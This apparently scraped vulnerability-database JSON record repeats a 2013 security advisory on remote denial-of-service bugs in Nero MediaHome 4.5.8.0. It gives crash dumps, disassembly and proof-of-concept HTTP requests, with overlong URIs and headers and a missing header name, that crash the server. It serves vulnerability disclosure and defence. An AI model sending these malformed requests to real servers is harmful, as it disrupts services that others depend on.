N/A\r\n ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)\r\n +00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)\r\n +04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)\r\n +08: 00000000 ( 0) -> N/A\r\n +0c: 00000001 ( 1) -> N/A\r\n +10: 000000b8 ( 184) -> N/A\r\n +14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n\t0x10003156 mov edx,[esi+0x8]\r\n\t0x10003159 mov ebp,[esi+0xc]\r\n\t0x1000315c push byte 0x1\r\n\t0x1000315e push eax\r\n\t0x1000315f push ecx\r\n\t0x10003160 push ebx\r\n\t0x10003161 mov [edi+0x40],esi\r\n\t0x10003164 mov [esp+0x2c],edx\r\n\t0x10003168 call 0x10002730\r\n\t0x1000316d mov ecx,[esp+0x2c]\r\n\t0x10003171 mov [eax+0x18],ebp\r\n\t0x10003174 mov ebp,[esp+0x24]\r\n\t0x10003178 add esp,0x10\r\n\t0x1000317b mov [eax+0x14],ecx\r\n\t0x1000317e mov edx,[ebp+0x8]\r\n\t0x10003181 test edx,edx\r\n\t0x10003183 mov [esp+0x14],edx\r\n\t0x10003187 jnz 0x10002ff0\r\n\t0x1000318d mov eax,[esp+0x24]\r\n\t0x10003191 push eax\r\n\t0x10003192 call 0x10002c20\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash Nero MediaHome server remotely:\r\n\r\nGET / HTTP/1.1\r\n: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer: http://www.host.com\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nVendor last response (January 9, 2013):\r\n"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon."\r\n\r\nAs a temporary solution it is advised to remove the vulnerable application from your system.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23130 - https://www.htbridge.com/advisory/HTB23130 - Nero MediaHome Server Multiple Remote DoS vulnerabilities.\r\n[2] Nero - http://www.nero.com - Nero MediaHome server easily distributes music, videos and photos over your network.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "published": "2013-01-10T00:00:00", "modified": "2013-01-10T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28947", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2012-5876", "CVE-2012-5877"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:46", "edition": 1, "viewCount": 11, "enchantments": {"score": {"value": 6.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-5876", "CVE-2012-5877"]}, {"type": "exploitdb", "idList": ["EDB-ID:24022"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:84B8B4D7CE121A11D90EAFE9250FF34E"]}, {"type": "htbridge", "idList": ["HTB23130"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803150"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119424"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12824"]}, {"type": "zdt", "idList": ["1337DAY-ID-20143"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2012-5876", "CVE-2012-5877"]}, {"type": "exploitdb", "idList": ["EDB-ID:24022"]}, {"type": "htbridge", "idList": ["HTB23130"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803150"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119424"]}]}, "exploitation": null, "vulnersScore": 6.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"securityvulns": [{"lastseen": "2021-06-08T19:03:38", "bulletinFamily": "software", "cvelist": ["CVE-2012-5876", "CVE-2012-5877"], "description": "Different vulnerabilities on TCP/54444 requests parsing.", "edition": 2, "modified": "2013-01-10T00:00:00", "published": "2013-01-10T00:00:00", "id": "SECURITYVULNS:VULN:12824", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12824", "title": "Nero MediaHome DoS", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "htbridge": [{"lastseen": "2020-12-24T11:37:29", "description": "High-Tech Bridge Security Research Lab has discovered multiple DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely. \n \n1) Off-by-one errors in Nero MediaHome server: CVE-2012-5876 \n1.1 The vulnerability exists due to an off-by-one error in NMMediaServerService.dll when handling HTTP requests with overly long request lines. A remote attacker can send multiple HTTP requests with request line of at least 135 168 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause immediate crash of Nero MediaHome server. \n**Crash details:** \nEIP: 7c921689 mov ecx,[ecx] \nEAX: 03b2a808 ( 62040072) -> (heap) \nEBX: 003e0000 ( 4063232) -> b@>@>\" (heap) \nECX: 00000000 ( 0) -> N/A \nEDX: 00000000 ( 0) -> N/A \nEDI: 03b2b000 ( 62042112) -> D (heap) \nESI: 03b2a800 ( 62040064) -> (heap) \nEBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. (stack) \nESP: 0526f848 ( 86440008) -> >\">&|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>. (stack) \n+00: 003e0000 ( 4063232) -> b@>@>\" (heap) \n+04: 00000022 ( 34) -> N/A \n+08: 003e0004 ( 4063236) -> b@>@>\" (heap) \n+0c: 0526f88c ( 86440076) -> &$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack) \n+10: 7c928ccd (2089979085) -> N/A \n+14: 00000000 ( 0) -> N/A \n**Disasm around:** \n0x7c921664 mov ecx,[ebp+0x10] \n0x7c921667 add eax,[ecx] \n0x7c921669 cmp eax,0xfe00 \n0x7c92166e ja 0x7c920721 \n0x7c921674 cmp byte [ebp+0x14],0x0 \n0x7c921678 jnz 0x7c95ae10 \n0x7c92167e mov ecx,[esi+0xc] \n0x7c921681 lea eax,[esi+0x8] \n0x7c921684 mov edx,[eax] \n0x7c921686 mov [ebp+0x8],ecx \n0x7c921689 mov ecx,[ecx] \n0x7c92168b cmp ecx,[edx+0x4] \n0x7c92168e mov [ebp+0xc],edx \n0x7c921691 jnz 0x7c921734 \n0x7c921697 cmp ecx,eax \n0x7c921699 jnz 0x7c921734 \n0x7c92169f push esi \n0x7c9216a0 push ebx \n0x7c9216a1 call 0x7c920684 \n0x7c9216a6 mov eax,[ebp+0xc] \n0x7c9216a9 mov ecx,[ebp+0x8] \n**Proof of Concept:** \nThe following HTTP request, sent a number of times, will crash the vulnerable Nero MediaHome server: \nGET /[A * 135168 or more] HTTP/1.1 \nHOST: somehost.com \nACCEPT: */* \nAccept-Encoding: None \nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) \nConnection: Close \nAccept-Transfer-Encoding: None \n \n1.2 The vulnerability exists due insufficient validation of HTTP request header values in NMMediaServer.dll. A remote attacker can send a specially crafted HTTP request containing an overly long header value (at least 135 168 characters long) to port 54444/TCP, cause a heap-based buffer overflow and crash the vulnerable application. \n**Crash details:** \nEIP: 7c920a19 mov ecx,[ecx] \nEAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap) \nEBX: 003e0000 ( 4063232) -> Tp@>\\+ (heap) \nECX: 41414141 (1094795585) -> N/A \nEDX: 41414141 (1094795585) -> N/A \nEDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap) \nESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap) \nEBP: 0527f828 ( 86505512) -> `' (stack) \nESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' | (stack) \n+00: 003e0000 ( 4063232) -> Tp@>\\+ (heap) \n+04: 00000021 ( 33) -> N/A \n+08: 003e0004 ( 4063236) -> Tp@>\\+ (heap) \n+0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' |>@'X`4' |`| (stack) \n+10: 7c928ccd (2089979085) -> N/A \n+14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap) \n**Disasm around:** \n0x7c9209f8 jnz 0x7c95af5f \n0x7c9209fe mov al,[esi+0x5] \n0x7c920a01 and al,0x10 \n0x7c920a03 test al,0x10 \n0x7c920a05 mov [edi+0x5],al \n0x7c920a08 jnz 0x7c920aa0 \n0x7c920a0e mov ecx,[esi+0xc] \n0x7c920a11 lea eax,[esi+0x8] \n0x7c920a14 mov edx,[eax] \n0x7c920a16 mov [ebp+0xc],ecx \n0x7c920a19 mov ecx,[ecx] \n0x7c920a1b cmp ecx,[edx+0x4] \n0x7c920a1e mov [ebp+0x14],edx \n0x7c920a21 jnz 0x7c921752 \n0x7c920a27 cmp ecx,eax \n0x7c920a29 jnz 0x7c921752 \n0x7c920a2f push esi \n0x7c920a30 push ebx \n0x7c920a31 call 0x7c920684 \n0x7c920a36 mov eax,[ebp+0x14] \n0x7c920a39 mov ecx,[ebp+0xc] \n**Proof of Concept:** \nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely: \nGET / HTTP/1.1 \nHost somehost.com \nUser-Agent: Mozilla/5.0 (Windows; U) \nAccept-Language: en-us,en;q=0.5 \nKeep-Alive: 300 \nConnection: keep-alive \nReferer:[A * 265566] \n \n2) NULL pointer dereference in Nero MediaHome server: CVE-2012-5877 \n2.1 The vulnerability exists due to a NULL pointer dereference error when handling HTTP request with missing HTTP header name. A remote attacker can send a specially crafted HTTP request with missing HTTP header name and crash Nero MediaHome server. \n**Crash details:** \nEIP: 10003171 mov [eax+0x18],ebp \nEAX: 00000000 ( 0) -> N/A \nEBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap) \nECX: 039cddea ( 60612074) -> localhost (heap) \nEDX: 039cddea ( 60612074) -> localhost (heap) \nEDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap) \nESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap) \nEBP: 00000009 ( 9) -> N/A \nESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack) \n+00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap) \n+04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap) \n+08: 00000000 ( 0) -> N/A \n+0c: 00000001 ( 1) -> N/A \n+10: 000000b8 ( 184) -> N/A \n+14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap) \n**Disasm around:** \n0x10003156 mov edx,[esi+0x8] \n0x10003159 mov ebp,[esi+0xc] \n0x1000315c push byte 0x1 \n0x1000315e push eax \n0x1000315f push ecx \n0x10003160 push ebx \n0x10003161 mov [edi+0x40],esi \n0x10003164 mov [esp+0x2c],edx \n0x10003168 call 0x10002730 \n0x1000316d mov ecx,[esp+0x2c] \n0x10003171 mov [eax+0x18],ebp \n0x10003174 mov ebp,[esp+0x24] \n0x10003178 add esp,0x10 \n0x1000317b mov [eax+0x14],ecx \n0x1000317e mov edx,[ebp+0x8] \n0x10003181 test edx,edx \n0x10003183 mov [esp+0x14],edx \n0x10003187 jnz 0x10002ff0 \n0x1000318d mov eax,[esp+0x24] \n0x10003191 push eax \n0x10003192 call 0x10002c20 \n**Proof of Concept:** \nThe following HTTP request will crash Nero MediaHome server remotely: \nGET / HTTP/1.1 \n: somehost.com \nUser-Agent: Mozilla/5.0 (Windows; U) \nAccept-Language: en-us,en;q=0.5 \nKeep-Alive: 300 \nConnection: keep-alive \nReferer: http://www.host.com\n", "edition": 2, "published": "2012-11-21T00:00:00", "type": "htbridge", "title": "Nero MediaHome Multiple Remote DoS Vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5876", "CVE-2012-5877"], "modified": "2013-01-30T00:00:00", "id": "HTB23130", "href": "https://www.htbridge.com/advisory/HTB23130", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P/"}}], "zdt": [{"lastseen": "2018-01-04T17:03:02", "description": "Nero MediaHome version 4.5.8.0 suffers from multiple denial of service vulnerabilities due to improper handling issues.", "cvss3": {}, "published": "2013-01-10T00:00:00", "type": "zdt", "title": "Nero MediaHome 4.5.8.0 Denial Of Service Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-5876", "CVE-2012-5877"], "modified": "2013-01-10T00:00:00", "id": "1337DAY-ID-20143", "href": "https://0day.today/exploit/description/20143", "sourceData": "Product: Nero MediaHome\r\nVendor: Nero\r\nVulnerable Version(s): 4.5.8.0 and probably prior\r\nTested Version: 4.5.8.0 in Windows 7 SP1\r\nVendor Notification: November 21, 2012 \r\nPublic Disclosure: January 9, 2013 \r\nVulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]\r\nCVE References: CVE-2012-5876, CVE-2012-5877\r\nCVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)\r\nRisk Level: Low \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.\r\n\r\n\r\n1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876\r\n\r\n1.1 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c921689 mov ecx,[ecx]\r\nEAX: 03b2a808 ( 62040072) -> (heap)\r\nEBX: 003e0000 ( 4063232) -> [email\u00a0protected]>@>\" (heap)\r\nECX: 00000000 ( 0) -> N/A\r\nEDX: 00000000 ( 0) -> N/A\r\nEDI: 03b2b000 ( 62042112) -> D (heap)\r\nESI: 03b2a800 ( 62040064) -> (heap)\r\nEBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. (stack)\r\nESP: 0526f848 ( 86440008) -> >\">&|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>. (stack)\r\n+00: 003e0000 ( 4063232) -> [email\u00a0protected]>@>\" (heap)\r\n+04: 00000022 ( 34) -> N/A\r\n+08: 003e0004 ( 4063236) -> [email\u00a0protected]>@>\" (heap)\r\n+0c: 0526f88c ( 86440076) -> &$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)\r\n+10: 7c928ccd (2089979085) -> N/A\r\n+14: 00000000 ( 0) -> N/A\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c921664 mov ecx,[ebp+0x10]\r\n 0x7c921667 add eax,[ecx]\r\n 0x7c921669 cmp eax,0xfe00\r\n 0x7c92166e ja 0x7c920721\r\n 0x7c921674 cmp byte [ebp+0x14],0x0\r\n 0x7c921678 jnz 0x7c95ae10\r\n 0x7c92167e mov ecx,[esi+0xc]\r\n 0x7c921681 lea eax,[esi+0x8]\r\n 0x7c921684 mov edx,[eax]\r\n 0x7c921686 mov [ebp+0x8],ecx\r\n 0x7c921689 mov ecx,[ecx]\r\n 0x7c92168b cmp ecx,[edx+0x4]\r\n 0x7c92168e mov [ebp+0xc],edx\r\n 0x7c921691 jnz 0x7c921734\r\n 0x7c921697 cmp ecx,eax\r\n 0x7c921699 jnz 0x7c921734\r\n 0x7c92169f push esi\r\n 0x7c9216a0 push ebx\r\n 0x7c9216a1 call 0x7c920684\r\n 0x7c9216a6 mov eax,[ebp+0xc]\r\n 0x7c9216a9 mov ecx,[ebp+0x8]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nGET /[A * 500000] HTTP/1.1\r\nHOST: somehost.com\r\nACCEPT: */*\r\nAccept-Encoding: None\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\nConnection: Close\r\nAccept-Transfer-Encoding: None\r\n\r\n\r\n\r\n1.2 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c921689 mov ecx,[ecx]\r\nEAX: 03b63008 ( 62271496) -> (heap)\r\nEBX: 003e0000 ( 4063232) -> # [email\u00a0protected]>+ (heap)\r\nECX: 00000000 ( 0) -> N/A\r\nEDX: 00000000 ( 0) -> N/A\r\nEDI: 03b64000 ( 62275584) -> B (heap)\r\nESI: 03b63000 ( 62271488) -> (heap)\r\nEBP: 0527f864 ( 86505572) -> '|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]| (stack)\r\nESP: 0527f858 ( 86505560) -> >!>'|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' | (stack)\r\n+00: 003e0000 ( 4063232) -> # [email\u00a0protected]>+ (heap)\r\n+04: 00000021 ( 33) -> N/A\r\n+08: 003e0004 ( 4063236) -> # [email\u00a0protected]>+ (heap)\r\n+0c: 0527f89c ( 86505628) -> '$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)\r\n+10: 7c928ccd (2089979085) -> N/A\r\n+14: 00000000 ( 0) -> N/A\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c921664 mov ecx,[ebp+0x10]\r\n 0x7c921667 add eax,[ecx]\r\n 0x7c921669 cmp eax,0xfe00\r\n 0x7c92166e ja 0x7c920721\r\n 0x7c921674 cmp byte [ebp+0x14],0x0\r\n 0x7c921678 jnz 0x7c95ae10\r\n 0x7c92167e mov ecx,[esi+0xc]\r\n 0x7c921681 lea eax,[esi+0x8]\r\n 0x7c921684 mov edx,[eax]\r\n 0x7c921686 mov [ebp+0x8],ecx\r\n 0x7c921689 mov ecx,[ecx]\r\n 0x7c92168b cmp ecx,[edx+0x4]\r\n 0x7c92168e mov [ebp+0xc],edx\r\n 0x7c921691 jnz 0x7c921734\r\n 0x7c921697 cmp ecx,eax\r\n 0x7c921699 jnz 0x7c921734\r\n 0x7c92169f push esi\r\n 0x7c9216a0 push ebx\r\n 0x7c9216a1 call 0x7c920684\r\n 0x7c9216a6 mov eax,[ebp+0xc]\r\n 0x7c9216a9 mov ecx,[ebp+0x8]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nHEAD / [A * 265696] HTTP/1.1\r\nACCEPT: */*\r\nAccept-Encoding: None\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\nConnection: Close\r\nAccept-Transfer-Encoding: None\r\n\r\n\r\n\r\n1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c920a1b cmp ecx,[edx+0x4]\r\nEAX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^[email\u00a0protected]_lhf19fPf36dLaExe (heap)\r\nEBX: 003e0000 ( 4063232) -> @>+ (heap)\r\nECX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^[email\u00a0protected]_lhf19fPf36dLaExe (heap)\r\nEDX: 03b50101 ( 62193921) -> N/A\r\nEDI: 03c1bb30 ( 63028016) -> yDPyDh8yDh >>#H\"G^^^^o^[email\u00a0protected]_l (heap)\r\nESI: 03c1bb88 ( 63028104) -> >>#H\"G^^^^o^[email\u00a0protected]_lhf19fPf36dLaExe (heap)\r\nEBP: 033bfc78 ( 54262904) -> L;L (stack)\r\nESP: 033bfc6c ( 54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@[email\u00a0protected] >@>;;; |`|;9Lx> (stack)\r\n+00: 003e0000 ( 4063232) -> @>+ (heap)\r\n+04: 03c1bb78 ( 63028088) -> >>#H\"G^^^^o^[email\u00a0protected]_lhf19fPf36dLa (heap)\r\n+08: 00000000 ( 0) -> N/A\r\n+0c: 033bfd4c ( 54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;[email\u00a0protected]?[email\u00a0protected]@[email\u00a0protected]@@ (stack)\r\n+10: 7c92084c (2089945164) -> N/A\r\n+14: 03adb908 ( 61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c9209fe mov al,[esi+0x5]\r\n 0x7c920a01 and al,0x10\r\n 0x7c920a03 test al,0x10\r\n 0x7c920a05 mov [edi+0x5],al\r\n 0x7c920a08 jnz 0x7c920aa0\r\n 0x7c920a0e mov ecx,[esi+0xc]\r\n 0x7c920a11 lea eax,[esi+0x8]\r\n 0x7c920a14 mov edx,[eax]\r\n 0x7c920a16 mov [ebp+0xc],ecx\r\n 0x7c920a19 mov ecx,[ecx]\r\n 0x7c920a1b cmp ecx,[edx+0x4]\r\n 0x7c920a1e mov [ebp+0x14],edx\r\n 0x7c920a21 jnz 0x7c921752\r\n 0x7c920a27 cmp ecx,eax\r\n 0x7c920a29 jnz 0x7c921752\r\n 0x7c920a2f push esi\r\n 0x7c920a30 push ebx\r\n 0x7c920a31 call 0x7c920684\r\n 0x7c920a36 mov eax,[ebp+0x14]\r\n 0x7c920a39 mov ecx,[ebp+0xc]\r\n 0x7c920a3c cmp eax,ecx\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nOPTIONS / [A * 265712]\r\nHost: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nReferer: http://www.host.com\r\n\r\n\r\n\r\n1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. \r\n\r\nCrash details:\r\n\r\nEIP: 7c920a19 mov ecx,[ecx]\r\nEAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\r\nEBX: 003e0000 ( 4063232) -> [email\u00a0protected]>+ (heap)\r\nECX: 41414141 (1094795585) -> N/A\r\nEDX: 41414141 (1094795585) -> N/A\r\nEDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)\r\nESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\r\nEBP: 0527f828 ( 86505512) -> `' (stack)\r\nESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' | (stack)\r\n +00: 003e0000 ( 4063232) -> [email\u00a0protected]>+ (heap)\r\n +04: 00000021 ( 33) -> N/A\r\n +08: 003e0004 ( 4063236) -> [email\u00a0protected]>+ (heap)\r\n +0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' |>@'X`4' |`| (stack)\r\n +10: 7c928ccd (2089979085) -> N/A\r\n +14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c9209f8 jnz 0x7c95af5f\r\n 0x7c9209fe mov al,[esi+0x5]\r\n 0x7c920a01 and al,0x10\r\n 0x7c920a03 test al,0x10\r\n 0x7c920a05 mov [edi+0x5],al\r\n 0x7c920a08 jnz 0x7c920aa0\r\n 0x7c920a0e mov ecx,[esi+0xc]\r\n 0x7c920a11 lea eax,[esi+0x8]\r\n 0x7c920a14 mov edx,[eax]\r\n 0x7c920a16 mov [ebp+0xc],ecx\r\n 0x7c920a19 mov ecx,[ecx]\r\n 0x7c920a1b cmp ecx,[edx+0x4]\r\n 0x7c920a1e mov [ebp+0x14],edx\r\n 0x7c920a21 jnz 0x7c921752\r\n 0x7c920a27 cmp ecx,eax\r\n 0x7c920a29 jnz 0x7c921752\r\n 0x7c920a2f push esi\r\n 0x7c920a30 push ebx\r\n 0x7c920a31 call 0x7c920684\r\n 0x7c920a36 mov eax,[ebp+0x14]\r\n 0x7c920a39 mov ecx,[ebp+0xc]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nGET / HTTP/1.1\r\nHost: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer:[A * 265566]\r\n\r\n\r\n\r\n2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877\r\n\r\n2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.\r\n\r\nCrash details:\r\n\r\nEIP: 10003171 mov [eax+0x18],ebp\r\n EAX: 00000000 ( 0) -> 